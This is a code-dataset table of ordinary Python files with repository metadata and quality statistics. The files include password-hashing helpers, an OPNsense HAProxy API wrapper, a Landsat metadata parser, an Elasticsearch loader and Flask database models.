hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
39de946189cea1d5c6578bc6547c0c6f3716e5d1 | 128 | py | Python | tahoe-viz/genolake/tahoe/pileup/_version.py | genolake/tahoe | c9cab1848f7b2afc8055325f8076d2d60706ea23 | [
"Apache-2.0"
] | null | null | null | tahoe-viz/genolake/tahoe/pileup/_version.py | genolake/tahoe | c9cab1848f7b2afc8055325f8076d2d60706ea23 | [
"Apache-2.0"
] | null | null | null | tahoe-viz/genolake/tahoe/pileup/_version.py | genolake/tahoe | c9cab1848f7b2afc8055325f8076d2d60706ea23 | [
"Apache-2.0"
] | 1 | 2019-11-05T05:24:33.000Z | 2019-11-05T05:24:33.000Z |
version_info = (0, 0, '6a1')
__version__ = '.'.join(map(str, version_info))
if __name__ == '__main__':
print(__version__)
| 18.285714 | 46 | 0.65625 | 16 | 128 | 4.125 | 0.6875 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037037 | 0.15625 | 128 | 6 | 47 | 21.333333 | 0.574074 | 0 | 0 | 0 | 0 | 0 | 0.094488 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.25 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
39e7b8ea692f36b83e452a2546d38effbe2899f6 | 297 | py | Python | data_structures/01_arrays/01_arrays_reversing_a_list.py | ganius/hackerrank | 4bf394b54c3f54e9ec36fb586e9bf6307018d02b | [
"MIT"
] | null | null | null | data_structures/01_arrays/01_arrays_reversing_a_list.py | ganius/hackerrank | 4bf394b54c3f54e9ec36fb586e9bf6307018d02b | [
"MIT"
] | null | null | null | data_structures/01_arrays/01_arrays_reversing_a_list.py | ganius/hackerrank | 4bf394b54c3f54e9ec36fb586e9bf6307018d02b | [
"MIT"
] | null | null | null | # Python equivalent of an array is a list
def reverse_array(a_list):
"""
https://www.hackerrank.com/challenges/01_arrays-ds/problem
We can reverse an array by simply providing the step value in list slice parameters
-1 means go backwards one by one
"""
return a_list[::-1]
| 33 | 87 | 0.707071 | 48 | 297 | 4.291667 | 0.75 | 0.072816 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017021 | 0.208754 | 297 | 8 | 88 | 37.125 | 0.859574 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
f2d22039a6d22767171c583a91961af97d4ac91e | 167 | py | Python | 2019-08-10/07/zad7.py | SzczecinTech/zadania-rekrutacyjne | fad5d7a6ab7ae77e567610c56fbbcd4a38f8b2c2 | [
"MIT"
] | 1 | 2019-09-05T20:35:07.000Z | 2019-09-05T20:35:07.000Z | 2019-08-10/07/zad7.py | SzczecinTech/zadania-rekrutacyjne | fad5d7a6ab7ae77e567610c56fbbcd4a38f8b2c2 | [
"MIT"
] | 1 | 2020-03-20T15:27:10.000Z | 2020-03-20T15:27:10.000Z | 2019-08-10/07/zad7.py | SzczecinTech/zadania-rekrutacyjne | fad5d7a6ab7ae77e567610c56fbbcd4a38f8b2c2 | [
"MIT"
] | 10 | 2019-08-10T08:26:09.000Z | 2019-08-15T13:50:48.000Z | def equal_slices(total, num, per_person):
res = num * per_person
if res <= total:
return True
return False
foo = equal_slices(11, 11, 1)
print(str(foo))
| 13.916667 | 41 | 0.664671 | 27 | 167 | 3.962963 | 0.62963 | 0.205607 | 0.224299 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038462 | 0.221557 | 167 | 11 | 42 | 15.181818 | 0.784615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0 | 0 | 0.428571 | 0.142857 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
f2edc5c9941669eccaf74856a2a5e02867c5e5e2 | 1,339 | py | Python | backend/app/helpers/auth/password.py | shvixxl/tablic | 3ca2f026d84fab9692e7e5adde74a9716266ff5e | [
"MIT"
] | 2 | 2021-02-05T16:55:41.000Z | 2021-02-07T21:46:37.000Z | backend/app/helpers/auth/password.py | shvixxl/tablic | 3ca2f026d84fab9692e7e5adde74a9716266ff5e | [
"MIT"
] | 1 | 2021-10-30T15:42:53.000Z | 2021-10-30T15:42:53.000Z | backend/app/helpers/auth/password.py | shvixxl/tablic | 3ca2f026d84fab9692e7e5adde74a9716266ff5e | [
"MIT"
] | null | null | null | """Password helpers."""
import hashlib
import hmac
import bcrypt
def generate_password_hash(password: str) -> bytes:
"""Generates a password hash using bcrypt."""
password = _clean_password(password)
return bcrypt.hashpw(password, bcrypt.gensalt())
def check_password_hash(password: str, password_hash: str) -> bool:
"""Compares password and password hash."""
password = _clean_password(password)
password_hash = _unicode_to_bytes(password_hash)
return hmac.compare_digest(
bcrypt.hashpw(password, password_hash),
password_hash
)
def _unicode_to_bytes(unicode: str) -> bytes:
"""Converts a unicode string to a bytes object."""
if isinstance(unicode, str):
return bytes(unicode, 'utf-8')
return unicode
def _prehash_password(password: bytes) -> bytes:
"""
Pre-hash password with SHA-256 to get rid of bcrypt limits (72 bytes)
and take its hexdigest to prevent NULL byte problems.
"""
password = hashlib.sha256(password).hexdigest()
password = _unicode_to_bytes(password)
return password
def _clean_password(password: str) -> bytes:
"""
Encodes password as bytes before hashing and pre-hashes it with SHA-256.
"""
password = _unicode_to_bytes(password)
password = _prehash_password(password)
return password
| 26.78 | 76 | 0.705004 | 165 | 1,339 | 5.527273 | 0.345455 | 0.118421 | 0.087719 | 0.072368 | 0.065789 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011173 | 0.197909 | 1,339 | 49 | 77 | 27.326531 | 0.837989 | 0.250934 | 0 | 0.24 | 1 | 0 | 0.005274 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0.64 | 0.12 | 0 | 0.56 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
f2fc01bff8a220898ad876f66504e04de4a5324f | 254 | py | Python | treetest2/abstract_application_vertex.py | Christian-B/my_spinnaker | b19f4025878bc4fbd6d81d78cec8c284929e148b | [
"MIT"
] | null | null | null | treetest2/abstract_application_vertex.py | Christian-B/my_spinnaker | b19f4025878bc4fbd6d81d78cec8c284929e148b | [
"MIT"
] | null | null | null | treetest2/abstract_application_vertex.py | Christian-B/my_spinnaker | b19f4025878bc4fbd6d81d78cec8c284929e148b | [
"MIT"
] | null | null | null | from abstract_vertex import AbstractVertex
class AbstractApplicationVertex(AbstractVertex):
""" A vertex that can be broken down into a number of smaller vertices\
based on the resources that the vertex requires
"""
__slots__ = ()
| 25.4 | 75 | 0.732283 | 30 | 254 | 6.033333 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.216535 | 254 | 9 | 76 | 28.222222 | 0.909548 | 0.476378 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
8406e2387b720b16d69db7b66bd69d4bdbd4ea91 | 2,089 | py | Python | packages/sdk/odahuflow/sdk/models/api_local_backend_config.py | odahu/odahuflow | 58c3220a266a61bb893cf79c4b994569e3445097 | [
"ECL-2.0",
"Apache-2.0"
] | 12 | 2020-10-13T15:39:52.000Z | 2021-10-11T17:13:42.000Z | packages/sdk/odahuflow/sdk/models/api_local_backend_config.py | odahu/odahuflow | 58c3220a266a61bb893cf79c4b994569e3445097 | [
"ECL-2.0",
"Apache-2.0"
] | 475 | 2019-11-18T12:40:47.000Z | 2022-03-29T21:17:38.000Z | packages/sdk/odahuflow/sdk/models/api_local_backend_config.py | odahu/odahuflow | 58c3220a266a61bb893cf79c4b994569e3445097 | [
"ECL-2.0",
"Apache-2.0"
] | 4 | 2020-02-25T11:26:10.000Z | 2021-03-10T12:01:00.000Z | # coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from odahuflow.sdk.models.base_model_ import Model
from odahuflow.sdk.models import util
class APILocalBackendConfig(Model):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, local_backend_crd_path: str=None): # noqa: E501
"""APILocalBackendConfig - a model defined in Swagger
:param local_backend_crd_path: The local_backend_crd_path of this APILocalBackendConfig. # noqa: E501
:type local_backend_crd_path: str
"""
self.swagger_types = {
'local_backend_crd_path': str
}
self.attribute_map = {
'local_backend_crd_path': 'localBackendCrdPath'
}
self._local_backend_crd_path = local_backend_crd_path
@classmethod
def from_dict(cls, dikt) -> 'APILocalBackendConfig':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The APILocalBackendConfig of this APILocalBackendConfig. # noqa: E501
:rtype: APILocalBackendConfig
"""
return util.deserialize_model(dikt, cls)
@property
def local_backend_crd_path(self) -> str:
"""Gets the local_backend_crd_path of this APILocalBackendConfig.
Path to a dir with ODAHU CRDs # noqa: E501
:return: The local_backend_crd_path of this APILocalBackendConfig.
:rtype: str
"""
return self._local_backend_crd_path
@local_backend_crd_path.setter
def local_backend_crd_path(self, local_backend_crd_path: str):
"""Sets the local_backend_crd_path of this APILocalBackendConfig.
Path to a dir with ODAHU CRDs # noqa: E501
:param local_backend_crd_path: The local_backend_crd_path of this APILocalBackendConfig.
:type local_backend_crd_path: str
"""
self._local_backend_crd_path = local_backend_crd_path
| 31.179104 | 110 | 0.688846 | 260 | 2,089 | 5.223077 | 0.284615 | 0.185567 | 0.231959 | 0.293814 | 0.519882 | 0.488218 | 0.395434 | 0.354197 | 0.318115 | 0.225331 | 0 | 0.013924 | 0.243657 | 2,089 | 66 | 111 | 31.651515 | 0.84557 | 0.447583 | 0 | 0.086957 | 0 | 0 | 0.085366 | 0.066057 | 0 | 0 | 0 | 0 | 0 | 1 | 0.173913 | false | 0 | 0.217391 | 0 | 0.521739 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
84084c6a3b99d8dc70f3680310f43da8f148dcad | 1,632 | py | Python | icor-src/icor/landsat8_metadata.py | DHI-GRAS/docker-icor | 40fa1cbca545f191916a6eedfd6e1b9cf053ec6f | [
"MIT"
] | 3 | 2019-10-29T11:34:49.000Z | 2021-05-17T15:16:05.000Z | icor-src/icor/landsat8_metadata.py | DHI-GRAS/docker-icor | 40fa1cbca545f191916a6eedfd6e1b9cf053ec6f | [
"MIT"
] | 1 | 2021-12-17T21:33:17.000Z | 2022-01-18T19:29:27.000Z | icor-src/icor/landsat8_metadata.py | DHI-GRAS/docker-icor | 40fa1cbca545f191916a6eedfd6e1b9cf053ec6f | [
"MIT"
] | null | null | null | import datetime
class Landsat8_metadata:
def __init__(self,config_file_location):
self.config_file_location = config_file_location
def parse_config_file(self):
self.keys_vars = {}
with open(self.config_file_location) as config_file:
for line in config_file:
name, var = line.partition("=")[::2]
self.keys_vars[name.strip()] = var
def sun_elevation(self):
return float(self.keys_vars["SUN_ELEVATION"])
def sun_zenith(self):
return (90.0 - float(self.keys_vars["SUN_ELEVATION"]))
def get_scene_name(self):
return str(self.keys_vars["LANDSAT_SCENE_ID"]).strip("\n").strip(" ").replace('"','')
def get_gain_reflectance(self,band):
return float(self.keys_vars["REFLECTANCE_MULT_BAND_"+ str(band+1)])
def get_bias_reflectance(self,band):
return float(self.keys_vars["REFLECTANCE_ADD_BAND_"+ str(band+1)])
def get_earth_sun_distance(self):
#Get the distance in Astronomical Units (1AU = 149,599,650 km)
sun_earth_distance = 1.0 - 0.01672*cos(0.9852*(get_doy() - 4.0)*(deg_to_rad))
return sun_earth_distance
def get_doy(self):
date_mtl = self.keys_vars["DATE_ACQUIRED"]
if date_mtl == None:
raise Exception("Could not parse DATA_ACQUIRED from MTL file")
date_mtl = date_mtl.replace("\n","")
date_mtl = date_mtl.replace(" ","")
date_mtl = date_mtl.strip()
date = datetime.datetime.strptime(date_mtl,"%Y-%m-%d")
doy = date.timetuple().tm_yday
return doy | 30.222222 | 93 | 0.629902 | 221 | 1,632 | 4.352941 | 0.371041 | 0.065489 | 0.099792 | 0.070686 | 0.264033 | 0.214137 | 0.176715 | 0.110187 | 0.110187 | 0 | 0 | 0.025932 | 0.243873 | 1,632 | 54 | 94 | 30.222222 | 0.753647 | 0.037377 | 0 | 0 | 0 | 0 | 0.099936 | 0.027371 | 0 | 0 | 0 | 0 | 0 | 1 | 0.272727 | false | 0 | 0.030303 | 0.151515 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
843ca3b527a6b2c99ac8cde18d4a7dfd486b1627 | 6,239 | py | Python | opnsense_cli/api/plugin/haproxy.py | jan-win1993/opn-cli | 83c4792571dacbe6483722a95276954c7a2d0b3c | [
"BSD-2-Clause"
] | 13 | 2021-05-17T10:42:25.000Z | 2022-02-21T02:10:41.000Z | opnsense_cli/api/plugin/haproxy.py | jan-win1993/opn-cli | 83c4792571dacbe6483722a95276954c7a2d0b3c | [
"BSD-2-Clause"
] | 14 | 2021-05-17T13:53:27.000Z | 2021-12-16T12:45:44.000Z | opnsense_cli/api/plugin/haproxy.py | jan-win1993/opn-cli | 83c4792571dacbe6483722a95276954c7a2d0b3c | [
"BSD-2-Clause"
] | 2 | 2021-04-28T08:41:07.000Z | 2022-03-28T10:20:51.000Z | from opnsense_cli.api.base import ApiBase
class Export(ApiBase):
MODULE = "haproxy"
CONTROLLER = "export"
"""
Haproxy ExportController
"""
@ApiBase._api_call
def config(self, *args):
self.method = "get"
self.command = "config"
@ApiBase._api_call
def diff(self, *args):
self.method = "get"
self.command = "diff"
@ApiBase._api_call
def download(self, *args):
self.method = "get"
self.command = "download"
class Service(ApiBase):
MODULE = "haproxy"
CONTROLLER = "service"
"""
Haproxy ServiceController
"""
@ApiBase._api_call
def configtest(self, *args):
self.method = "get"
self.command = "configtest"
@ApiBase._api_call
def reconfigure(self, *args):
self.method = "post"
self.command = "reconfigure"
class Settings(ApiBase):
MODULE = "haproxy"
CONTROLLER = "settings"
"""
Haproxy SettingsController
"""
@ApiBase._api_call
def addAcl(self, *args):
self.method = "post"
self.command = "addAcl"
@ApiBase._api_call
def addAction(self, *args):
self.method = "post"
self.command = "addAction"
@ApiBase._api_call
def addBackend(self, *args, json=None):
self.method = "post"
self.command = "addBackend"
@ApiBase._api_call
def addCpu(self, *args):
self.method = "post"
self.command = "addCpu"
@ApiBase._api_call
def addErrorfile(self, *args):
self.method = "post"
self.command = "addErrorfile"
@ApiBase._api_call
def addFrontend(self, *args, json=None):
self.method = "post"
self.command = "addFrontend"
@ApiBase._api_call
def addGroup(self, *args):
self.method = "post"
self.command = "addGroup"
@ApiBase._api_call
def addHealthcheck(self, *args):
self.method = "post"
self.command = "addHealthcheck"
@ApiBase._api_call
def addLua(self, *args):
self.method = "post"
self.command = "addLua"
@ApiBase._api_call
def addMapfile(self, *args):
self.method = "post"
self.command = "addMapfile"
@ApiBase._api_call
def addServer(self, *args, json=None):
self.method = "post"
self.command = "addServer"
@ApiBase._api_call
def addUser(self, *args):
self.method = "post"
self.command = "addUser"
@ApiBase._api_call
def addmailer(self, *args):
self.method = "post"
self.command = "addmailer"
@ApiBase._api_call
def addresolver(self, *args):
self.method = "post"
self.command = "addresolver"
@ApiBase._api_call
def delAcl(self, *args):
self.method = "post"
self.command = "delAcl"
@ApiBase._api_call
def delAction(self, *args):
self.method = "post"
self.command = "delAction"
@ApiBase._api_call
def delBackend(self, *args, json=None):
self.method = "post"
self.command = "delBackend"
@ApiBase._api_call
def delCpu(self, *args):
self.method = "post"
self.command = "delCpu"
@ApiBase._api_call
def delErrorfile(self, *args):
self.method = "post"
self.command = "delErrorfile"
@ApiBase._api_call
def delFrontend(self, *args, json=None):
self.method = "post"
self.command = "delFrontend"
@ApiBase._api_call
def delGroup(self, *args):
self.method = "post"
self.command = "delGroup"
@ApiBase._api_call
def delHealthcheck(self, *args):
self.method = "post"
self.command = "delHealthcheck"
@ApiBase._api_call
def delLua(self, *args):
self.method = "post"
self.command = "delLua"
@ApiBase._api_call
def delMapfile(self, *args):
self.method = "post"
self.command = "delMapfile"
@ApiBase._api_call
def delServer(self, *args):
self.method = "post"
self.command = "delServer"
@ApiBase._api_call
def delUser(self, *args):
self.method = "post"
self.command = "delUser"
@ApiBase._api_call
def delmailer(self, *args):
self.method = "post"
self.command = "delmailer"
@ApiBase._api_call
def delresolver(self, *args):
self.method = "post"
self.command = "delresolver"
@ApiBase._api_call
def get(self, *args):
self.method = "get"
self.command = "get"
@ApiBase._api_call
def setAcl(self, *args):
self.method = "post"
self.command = "setAcl"
@ApiBase._api_call
def setAction(self, *args):
self.method = "post"
self.command = "setAction"
@ApiBase._api_call
def setBackend(self, *args, json=None):
self.method = "post"
self.command = "setBackend"
@ApiBase._api_call
def setCpu(self, *args):
self.method = "post"
self.command = "setCpu"
@ApiBase._api_call
def setErrorfile(self, *args):
self.method = "post"
self.command = "setErrorfile"
@ApiBase._api_call
def setFrontend(self, *args, json=None):
self.method = "post"
self.command = "setFrontend"
@ApiBase._api_call
def setGroup(self, *args):
self.method = "post"
self.command = "setGroup"
@ApiBase._api_call
def setHealthcheck(self, *args):
self.method = "post"
self.command = "setHealthcheck"
@ApiBase._api_call
def setLua(self, *args):
self.method = "post"
self.command = "setLua"
@ApiBase._api_call
def setMapfile(self, *args):
self.method = "post"
self.command = "setMapfile"
@ApiBase._api_call
def setServer(self, *args, json=None):
self.method = "post"
self.command = "setServer"
@ApiBase._api_call
def setUser(self, *args):
self.method = "post"
self.command = "setUser"
@ApiBase._api_call
def setmailer(self, *args):
self.method = "post"
self.command = "setmailer"
@ApiBase._api_call
def setresolver(self, *args):
self.method = "post"
self.command = "setresolver"
| 23.454887 | 44 | 0.586953 | 674 | 6,239 | 5.289318 | 0.109792 | 0.134642 | 0.188499 | 0.228892 | 0.46087 | 0.46087 | 0.46087 | 0.092006 | 0.092006 | 0 | 0 | 0 | 0.287546 | 6,239 | 265 | 45 | 23.543396 | 0.802025 | 0 | 0 | 0.490099 | 0 | 0 | 0.107096 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.237624 | false | 0 | 0.004951 | 0 | 0.287129 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
843f2a55fcd05086591f08ad88121805e043a093 | 1,218 | py | Python | DataCollection/DataLoader/src/elasticsearch_service.py | SerayBeser/-Data-Science-Tools | 767c1ee04bb26a42cf191b7a2e2687ead2bde618 | [
"Apache-2.0"
] | null | null | null | DataCollection/DataLoader/src/elasticsearch_service.py | SerayBeser/-Data-Science-Tools | 767c1ee04bb26a42cf191b7a2e2687ead2bde618 | [
"Apache-2.0"
] | null | null | null | DataCollection/DataLoader/src/elasticsearch_service.py | SerayBeser/-Data-Science-Tools | 767c1ee04bb26a42cf191b7a2e2687ead2bde618 | [
"Apache-2.0"
] | 1 | 2021-12-25T14:18:59.000Z | 2021-12-25T14:18:59.000Z | # coding=utf-8
"""
Elasticsearch Service
"""
__author__ = 'Seray Beser'
from elasticsearch import Elasticsearch
from DataCollection.DataLoader.src.abstract_service import AbstractService
class ElasticsearchService(AbstractService):
"""
Elasticsearch Service for importing and exporting data
"""
def __init__(self, url=None, __index__=None, __doc_type__=None):
super(ElasticsearchService, self).__init__(url)
self.client = Elasticsearch(hosts=url)
self.index = __index__
self.doc_type = __doc_type__
def __str__(self):
return 'Elasticsearch'
def save_to_db(self, data):
"""
Saves the data in the elasticsearch database
:param data:
"""
self.client.bulk(index=self.index, doc_type=self.doc_type, body=data,
request_timeout=500)
def read_from_db(self, query):
"""
Reads entries in the elasticsearch database by the query
:param query:
:return:
"""
return self.client.search(index=self.index, body=query)
def print_all_entry(self):
"""
Prints all entries in the elasticsearch database
"""
pass
| 24.857143 | 77 | 0.642036 | 134 | 1,218 | 5.5 | 0.440299 | 0.04749 | 0.07327 | 0.105834 | 0.089552 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004489 | 0.268473 | 1,218 | 48 | 78 | 25.375 | 0.822671 | 0.227422 | 0 | 0 | 0 | 0 | 0.029162 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.277778 | false | 0.055556 | 0.111111 | 0.055556 | 0.555556 | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
845957bb1d91596dcac23964647e7b219b32609a | 2,733 | py | Python | app/models.py | gitaux/flask-app | 3172927c65ff380ab8b9aeb8f3df42e357e1f35e | [
"MIT"
] | null | null | null | app/models.py | gitaux/flask-app | 3172927c65ff380ab8b9aeb8f3df42e357e1f35e | [
"MIT"
] | null | null | null | app/models.py | gitaux/flask-app | 3172927c65ff380ab8b9aeb8f3df42e357e1f35e | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# app/models.py
from flask_login import UserMixin
from werkzeug.security import generate_password_hash, check_password_hash
from app import db, lm
class User(UserMixin, db.Model):
"""
Create an User table.
"""
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
email = db.Column(db.String(60), index=True, unique=True)
name = db.Column(db.String(60), index=True, unique=True)
first_name = db.Column(db.String(60), index=True)
last_name = db.Column(db.String(60), index=True)
password_hash = db.Column(db.String(128))
group_id = db.Column(db.Integer, db.ForeignKey('groups.id'))
role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))
is_admin = db.Column(db.Boolean, default=False)
is_valid = db.Column(db.Boolean, default=False)
is_blocked = db.Column(db.Boolean, default=False)
@property
def password(self):
"""
Prevent password from been accessed.
:return:
"""
raise AttributeError('password is not a readable attribute.')
@password.setter
def password(self, password):
"""
Set password to hashed password.
:param password:
:return:
"""
self.password_hash = generate_password_hash(password)
def verify_password(self, password):
"""
Check if hashed password match actual password.
:param password:
:return:
"""
return check_password_hash(self.password_hash, password)
def __repr__(self):
return '<User: %s>' % self.username
@lm.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class Group(db.Model):
"""
Create a Group table.
"""
__tablename__ = 'groups'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(60), unique=True)
description = db.Column(db.String(200))
users = db.relationship('User', backref='group', lazy='dynamic')
def __repr__(self):
return '<Group: %s>' % self.name
class Role(db.Model):
"""
Create a Role table
"""
__tablename__ = 'roles'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(60), unique=True)
description = db.Column(db.String(200))
